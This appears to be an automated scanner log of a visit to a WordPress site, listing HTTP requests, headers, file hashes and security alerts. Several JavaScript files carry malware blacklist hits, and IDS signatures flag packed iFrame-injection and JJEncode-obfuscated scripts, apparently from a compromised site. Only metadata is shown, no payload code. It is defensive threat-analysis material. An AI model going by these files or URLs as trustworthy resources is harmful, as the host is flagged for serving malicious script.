X-Hello-Human: Say hello back! @getBootstrapCDN on Twitter
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
X-Cache: HIT


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   5376
Md5:    0488acb800bf92469c5f36c231db2c26
Sha1:   2b2504a83b7bd09bae626edc06c11bdc2a6de805
Sha256: d538f5bee062c9597cd251cbb45dcd0f934532b9979b9310253863577a86c9c5
                                        
                                            GET /css?family=Open+Sans&subset=latin HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         216.58.211.10
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Thu, 31 May 2018 16:17:52 GMT
Date: Thu, 31 May 2018 16:17:52 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   199
Md5:    375313158e168fdf76ac7b1052c7b459
Sha1:   9462ec744421b707ff4d2aac5ad7dcf09bcc63d4
Sha256: 9d4fb0d39c8811b04957fb62443cbd6263f958056ab33cd5fda1ed0e720ad95a
                                        
                                            GET /wp-content/themes/theme48340/bootstrap/css/responsive.css HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:38 GMT
Etag: "55b9-503fc564bbf80-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4226
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4226
Md5:    6325eab6a8fba55e127f4091b77ca770
Sha1:   59f9e919682320353d9bb9ef46e816a0c7e005eb
Sha256: 0fe5cf8a111e7368ab84fc34bed765f913c0a45c1a10b109d72d09bd26357acb
                                        
                                            GET /wp-content/themes/CherryFramework/css/camera.css HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Sun, 28 Sep 2014 07:32:34 GMT
Etag: "6698-5041b27540880-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3062
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   3062
Md5:    246e6d050fb1fcc0120507f8f6bf091f
Sha1:   ae17665fba767067c29c3de87ed9af55a256df2d
Sha256: b3c2599096a58b63f90cd239e38edf8b334ff1e75f076ed453fbc7c8e604ea8b
                                        
                                            GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/flexslider.css?ver=2.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 13:44:44 GMT
Etag: "e1d-503f81e9e0b00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1334
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1334
Md5:    6f425223e8abd0147ca48f8b3fa29b8c
Sha1:   320b38daa42740ee85fb32ff2fd43d06a5fba02f
Sha256: 8876c764e710c7b9b019b7c1af80a92f282b6c706c3b9d94c9dcea2468ba23b7
                                        
                                            GET /wp-content/themes/theme48340/bootstrap/css/bootstrap.css HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Wed, 15 Oct 2014 06:29:01 GMT
Etag: "1a3a3-505703f5ba540-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 16128
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   16128
Md5:    74d8c53ef4d20637ba25bc7a6e400264
Sha1:   d360fbe2c3074a40c8d3899a151736df875d83e5
Sha256: 813fec6c4559ae7a7c20ce019dde5f97a2fad2d3d69aeefbf0643398f0584fb8
                                        
                                            GET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1.24 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 13:44:44 GMT
Etag: "1808-503f81e9e0b00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1135
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1135
Md5:    98dd9d8cc1627f21f7bb320e8c3ef68a
Sha1:   5d924134ea5ecc7cd4dfdbae7621b17d1969cc2a
Sha256: 9afeaadb58d3dffcd0fb6fec6c462affab8e02a0953b1978b6f1d283e8f3e937
                                        
                                            GET /wp-content/themes/theme48340/style.css HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:38 GMT
Etag: "145-503fc564bbf80-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 229
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    360ba478981be22946ee1a8da2314029
Sha1:   b8df05e4ee7c0e68d6be38aaa1d552b2d8392c71
Sha256: 9c97a033ce0a0d8ec2800eb0cef66731fa12541e0b72f47abead27deb4d24dc5
                                        
                                            GET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.theme.css?ver=1.24 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 13:44:44 GMT
Etag: "6ce-503f81e9e0b00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 614
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   614
Md5:    5b5b7d8961092401cc830d20483b1c08
Sha1:   9e775ff04b362b69ef28826051b005f62c612494
Sha256: ec929f42b7fc76b4710a790e711df74e5ffac3ffbbaf3612a816b17ffa9b5758
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.0.1 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Fri, 17 Oct 2014 05:50:40 GMT
Etag: "44f-50597f1e3ec00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 469
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   469
Md5:    3a276951fd6e5687fcb83e1e6ad282a8
Sha1:   1b52d8ba9ab523170026b7f9be3e95481a6f3e06
Sha256: 6d879f788b9990bcb3c7ad7a1fc5abd27e9f417078a3f678b91e08ba8d57a671
                                        
                                            GET /wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 13:44:44 GMT
Etag: "6507-503f81e9e0b00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4765
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4765
Md5:    730776c69fb7e07db5f7b4fe3448dc13
Sha1:   2d91fbb3e1fefc846630357168e3b7c56fa59fcb
Sha256: 47b60eb1248c59c5d6b1e42d58b8bfc24b101605dfe8a256ab78dcc3721cec42
                                        
                                            GET /wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Sun, 28 Sep 2014 07:32:34 GMT
Etag: "2458-5041b27540880-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2166
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   2166
Md5:    a09ce8e4678cfe353277c1e09a0583bb
Sha1:   e68ca755adee445e3dc7245a3ce0e5ee977c6fc3
Sha256: 7777447189c5c3ab949af81760e6d78a9bf797c531383ad18cd71ec32a643213
                                        
                                            GET /wp-content/themes/theme48340/main-style.css HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Wed, 15 Oct 2014 06:29:02 GMT
Etag: "8177-505703f6ae780-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6077
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6077
Md5:    bd78161c592336e30a3c8c6c6e49b441
Sha1:   3b8a5bf4b42f87612ff50605f4702335dc913241
Sha256: 691b5c260cda1070effb4fcb71fc0bfc3213fa591e7acb8c601882c3f450096c
                                        
                                            GET /css?family=Open+Sans:400,600,300,300italic HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/wp-content/themes/theme48340/main-style.css

                                         
                                         216.58.211.10
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Thu, 31 May 2018 16:17:53 GMT
Date: Thu, 31 May 2018 16:17:53 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   292
Md5:    bcc5c4cc833ca40408fcdfef71d94b2e
Sha1:   7ce187477bb5d25205845c699f5bec7b12881afa
Sha256: 8b9ca75595c55dd4e707499a5da2be071463eaf3e47c4a0f623a85df873cad60
                                        
                                            GET /wp-includes/js/swfobject.js?ver=2.2-20120417 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:28 GMT
Etag: "4d19-51fcfe4086500-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 9228
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   9228
Md5:    9d93a51c1bd8dae095edb83ade29a880
Sha1:   5f9bb7a6fcd0b8272017bdde950bdf61de2bbccd
Sha256: 7d5660372d03b1ab62ce6f38eefe8c69005e6d245173d4019ad253fd04865254

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:18 GMT
Etag: "5782-51fcfe36fce80-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 10565
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   10565
Md5:    546b420fa03f47dc0a3b96d68822e670
Sha1:   ee9f445618f1284b2831c1d8036c06e9046550b3
Sha256: e288eaac36f019e26719148c56cf15111ea88e25427bda95132ef0ab547db67c

Alerts:
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
                                            GET /wp-content/themes/CherryFramework/js/custom.js?ver=1.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:50 GMT
Etag: "449b-51fcfe5581680-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7649
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   7649
Md5:    5d9aacb5d7dc8bac565f942d8d487664
Sha1:   3f31ded6b496d91fd542f5e6b0b8a652b90e6cee
Sha256: f5c02ab19b062331ccae0d4584b249b024b30f03cad3c2936a5058b63a4b5874

Alerts:
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
                                            GET /wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:38 GMT
Etag: "2ba2-51fcfe4a0fb80-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5989
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   5989
Md5:    aac3b4c8330aa3e30e1a36ad85b7e17d
Sha1:   d3858d3c55fae09048f0e9f41e29544546aef7c2
Sha256: 9d8c78cf90c6e44cb9134c6b451946e579bc434fc56c1aa80c468b838aec13d9

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:27 GMT
Etag: "4148-51fcfe3f922c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8377
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8377
Md5:    429c40d7b8db909c6f7a924a5995344c
Sha1:   00e65c582281a450f0bc958b89a38a24d5c40bc0
Sha256: 90755b40f7862ef68ef993e928781f72fce941d33b4c0b04d3a5d348e90d9a05
                                        
                                            GET /wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:25 GMT
Etag: "199ed-51fcfe3da9e40-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 39337
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   39337
Md5:    b244cbf73e8a52114751ead287700e3c
Sha1:   9815ed376062a9974e31ada794f02df8303f5ce2
Sha256: fd48dd6cda78af172614b0eec015413ff69f79dbb9527fc9d605a09f375b7116

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/comment-reply.min.js?ver=4.0.5 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:24 GMT
Etag: "2a57-51fcfe3cb5c00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5797
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   5797
Md5:    3ed00f9823108b1178338329853e47a0
Sha1:   278b5ec414085baccc7ae94c17096ef6e6ea31c7
Sha256: 3bf42caa387b06a8f05849e885850c7c40929a1f4231e925148d3ce954039fb9

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /homim/min.js HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Sun, 05 Jul 2015 00:50:38 GMT
Etag: "13ef-51a162d781380-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 673
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   673
Md5:    b520da869494998ad647a22240152d69
Sha1:   e61a236d0dfb5c2d64886b5423ba8b01e6df5ec3
Sha256: 5c818a551f24785178656cdc22fbff349e30e2da5370b9e89d67c3639cb53bb2

Alerts:
  Blacklists:
    - fortinet: Malware
  IDS:
    - ET INFO JJEncode Encoded Script
                                        
                                            GET /wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:21 GMT
Etag: "9587-51fcfe39d9540-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 13183
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   13183
Md5:    089078a74b4861624bb92fb62e8eca94
Sha1:   f2810eaf499e1e92bd0509307796de6ebbecea85
Sha256: 091664ad0b91c05dda641c4c2234fb2cb631946f2a04b31eaf436d276ddc80a9

Alerts:
  Blacklists:
    - fortinet: Malware
  IDS:
